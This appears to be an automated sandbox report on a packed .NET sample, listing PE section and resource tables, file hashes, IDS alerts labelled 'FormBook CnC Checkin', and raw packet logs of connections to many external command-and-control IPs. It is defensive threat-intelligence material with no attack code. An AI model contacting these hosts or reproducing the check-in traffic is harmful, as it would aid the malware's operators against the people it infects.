                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb70000x4f.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x4ca8.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x20000xb50580xb5400189765fb2ee49f09b810dd6cfecc9f8aFalse0.9382933728448276data7.814379411138541IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0xb80000x4ca80x5000843f3f08b881443c15ddd37cb4735d13False0.917626953125data7.667289957031235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0xbe0000xc0x400e618e9f8eb8329922a32cb78cce734dfFalse0.025390625data0.05585530805374581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_ICON0xb81000x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                                                            RT_GROUP_ICON0xbc80c0x14data1.05
                                                                                                                            RT_VERSION0xbc8300x278data0.4699367088607595
                                                                                                                            RT_MANIFEST0xbcab80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                            DLLImport
                                                                                                                            mscoree.dll_CorExeMain
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-03T14:38:32.568418+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64983013.248.169.4880TCP
                                                                                                                            2024-12-03T14:38:32.568418+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64983013.248.169.4880TCP
                                                                                                                            2024-12-03T14:38:50.059697+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649870154.90.35.24080TCP
                                                                                                                            2024-12-03T14:38:52.731586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649876154.90.35.24080TCP
                                                                                                                            2024-12-03T14:38:55.403519+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649883154.90.35.24080TCP
                                                                                                                            2024-12-03T14:38:58.419961+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649889154.90.35.24080TCP
                                                                                                                            2024-12-03T14:38:58.419961+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649889154.90.35.24080TCP
                                                                                                                            2024-12-03T14:39:05.373364+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649907162.0.213.9480TCP
                                                                                                                            2024-12-03T14:39:07.975620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649916162.0.213.9480TCP
                                                                                                                            2024-12-03T14:39:10.678060+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649922162.0.213.9480TCP
                                                                                                                            2024-12-03T14:39:13.325867+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649928162.0.213.9480TCP
                                                                                                                            2024-12-03T14:39:13.325867+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649928162.0.213.9480TCP
                                                                                                                            2024-12-03T14:39:20.607420+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64994668.66.226.9280TCP
                                                                                                                            2024-12-03T14:39:23.283014+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64995368.66.226.9280TCP
                                                                                                                            2024-12-03T14:39:25.939581+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64996068.66.226.9280TCP
                                                                                                                            2024-12-03T14:39:28.655512+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.64996568.66.226.9280TCP
                                                                                                                            2024-12-03T14:39:28.655512+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.64996568.66.226.9280TCP
                                                                                                                            2024-12-03T14:39:35.823243+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998131.31.196.1780TCP
                                                                                                                            2024-12-03T14:39:38.497451+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64998731.31.196.1780TCP
                                                                                                                            2024-12-03T14:39:41.282174+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.64999331.31.196.1780TCP
                                                                                                                            2024-12-03T14:39:43.826177+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65000031.31.196.1780TCP
                                                                                                                            2024-12-03T14:39:43.826177+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65000031.31.196.1780TCP
                                                                                                                            2024-12-03T14:39:51.245387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650020130.185.109.7780TCP
                                                                                                                            2024-12-03T14:39:53.834742+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650026130.185.109.7780TCP
                                                                                                                            2024-12-03T14:39:56.580474+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650033130.185.109.7780TCP
                                                                                                                            2024-12-03T14:39:59.181051+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650034130.185.109.7780TCP
                                                                                                                            2024-12-03T14:39:59.181051+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650034130.185.109.7780TCP
                                                                                                                            2024-12-03T14:40:09.460333+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650035172.104.82.7480TCP
                                                                                                                            2024-12-03T14:40:12.133262+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650036172.104.82.7480TCP
                                                                                                                            2024-12-03T14:40:14.950707+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650037172.104.82.7480TCP
                                                                                                                            2024-12-03T14:40:17.522871+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650038172.104.82.7480TCP
                                                                                                                            2024-12-03T14:40:17.522871+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650038172.104.82.7480TCP
                                                                                                                            2024-12-03T14:40:24.558464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650039208.91.197.2780TCP
                                                                                                                            2024-12-03T14:40:27.217634+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650040208.91.197.2780TCP
                                                                                                                            2024-12-03T14:40:29.803948+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650041208.91.197.2780TCP
                                                                                                                            2024-12-03T14:40:33.049521+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650042208.91.197.2780TCP
                                                                                                                            2024-12-03T14:40:33.049521+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650042208.91.197.2780TCP
                                                                                                                            2024-12-03T14:40:40.658339+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650043154.23.184.9580TCP
                                                                                                                            2024-12-03T14:40:43.325961+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650044154.23.184.9580TCP
                                                                                                                            2024-12-03T14:40:45.997652+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650045154.23.184.9580TCP
                                                                                                                            2024-12-03T14:40:48.765760+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650046154.23.184.9580TCP
                                                                                                                            2024-12-03T14:40:48.765760+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650046154.23.184.9580TCP
                                                                                                                            2024-12-03T14:40:55.729618+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650047172.104.18.23380TCP
                                                                                                                            2024-12-03T14:40:58.365545+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650048172.104.18.23380TCP
                                                                                                                            2024-12-03T14:41:01.169543+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650049172.104.18.23380TCP
                                                                                                                            2024-12-03T14:41:03.845046+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650050172.104.18.23380TCP
                                                                                                                            2024-12-03T14:41:03.845046+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650050172.104.18.23380TCP
                                                                                                                            2024-12-03T14:41:11.120114+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650052173.236.199.9780TCP
                                                                                                                            2024-12-03T14:41:13.842276+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650053173.236.199.9780TCP
                                                                                                                            2024-12-03T14:41:16.416218+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650054173.236.199.9780TCP
                                                                                                                            2024-12-03T14:41:19.134440+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650055173.236.199.9780TCP
                                                                                                                            2024-12-03T14:41:19.134440+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650055173.236.199.9780TCP
                                                                                                                            2024-12-03T14:41:26.888257+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65005685.159.66.9380TCP
                                                                                                                            2024-12-03T14:41:29.560132+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65005785.159.66.9380TCP
                                                                                                                            2024-12-03T14:41:32.232129+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65005885.159.66.9380TCP
                                                                                                                            2024-12-03T14:41:34.704363+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.65005985.159.66.9380TCP
                                                                                                                            2024-12-03T14:41:34.704363+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.65005985.159.66.9380TCP
                                                                                                                            2024-12-03T14:41:51.013348+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650060154.70.82.24680TCP
                                                                                                                            2024-12-03T14:41:55.487978+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650061154.70.82.24680TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 3, 2024 14:38:31.346998930 CET4983080192.168.2.613.248.169.48
                                                                                                                            Dec 3, 2024 14:38:31.468313932 CET804983013.248.169.48192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:31.468410015 CET4983080192.168.2.613.248.169.48
                                                                                                                            Dec 3, 2024 14:38:31.478219032 CET4983080192.168.2.613.248.169.48
                                                                                                                            Dec 3, 2024 14:38:31.598704100 CET804983013.248.169.48192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:32.568223953 CET804983013.248.169.48192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:32.568267107 CET804983013.248.169.48192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:32.568418026 CET4983080192.168.2.613.248.169.48
                                                                                                                            Dec 3, 2024 14:38:32.571538925 CET4983080192.168.2.613.248.169.48
                                                                                                                            Dec 3, 2024 14:38:32.692073107 CET804983013.248.169.48192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:48.406497955 CET4987080192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:48.526650906 CET8049870154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:48.526735067 CET4987080192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:48.544800997 CET4987080192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:48.665044069 CET8049870154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:50.059696913 CET4987080192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:50.180695057 CET8049870154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:50.180807114 CET4987080192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.080250025 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.200483084 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:51.200577974 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.216475010 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:51.337771893 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:52.731585979 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:52.855032921 CET8049876154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:52.855125904 CET4987680192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.751060963 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.871260881 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:53.871371031 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:53.897022009 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:54.017333984 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:54.017350912 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:55.403518915 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:55.524308920 CET8049883154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:55.524391890 CET4988380192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.422401905 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.542499065 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:56.542680025 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.553672075 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:56.674776077 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419655085 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419821024 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:38:58.419960976 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:58.422933102 CET4988980192.168.2.6154.90.35.240
                                                                                                                            Dec 3, 2024 14:38:58.542964935 CET8049889154.90.35.240192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:03.917500019 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.037640095 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:04.037727118 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.053203106 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:04.173197031 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373219967 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373302937 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373321056 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373363972 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.373498917 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373543024 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373569965 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373581886 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.373590946 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.373625040 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.374119997 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374170065 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.374237061 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374391079 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.374430895 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.493640900 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.493715048 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.493803978 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.497605085 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.546094894 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.571007013 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.583853960 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.583914995 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.584021091 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.584125042 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:05.586432934 CET8049907162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:05.586502075 CET4990780192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.579389095 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.699434042 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:06.699537992 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.715790987 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:06.835930109 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975531101 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975573063 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975588083 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975620031 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.975733042 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975747108 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975758076 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.975797892 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.975955963 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976114988 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976126909 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976170063 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:07.976305962 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:07.976378918 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.095854044 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.095899105 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.095980883 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.099980116 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.099992037 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.100056887 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.176652908 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.176692009 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.176768064 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.179326057 CET8049916162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:08.179388046 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:08.232121944 CET4991680192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.250837088 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.370929956 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:09.371021986 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.390208006 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:09.510238886 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:09.510286093 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677865982 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677980900 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.677992105 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678060055 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678219080 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678234100 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678278923 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678416014 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678435087 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678453922 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678617001 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678639889 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678652048 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678687096 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.798011065 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.798116922 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.798162937 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.802231073 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.856605053 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.869693995 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.869782925 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.869921923 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.872411013 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.872467041 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.904742002 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:11.923203945 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.043222904 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:12.043318033 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.053571939 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.173818111 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325678110 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325736046 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325747013 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325865984 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325866938 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.325892925 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325917006 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325927973 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325939894 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325952053 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.325977087 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.326571941 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.326729059 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.327213049 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.447828054 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.447870970 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.448005915 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.452145100 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.452200890 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.452409029 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.527012110 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.527049065 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.527193069 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.529548883 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.529675007 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.530620098 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.650979042 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:19.221251011 CET4994680192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:19.341284037 CET804994668.66.226.92192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:19.341375113 CET4994680192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:19.361783028 CET4994680192.168.2.668.66.226.92
                                                                                                                            Dec 3, 2024 14:39:19.481817961 CET804994668.66.226.92192.168.2.6
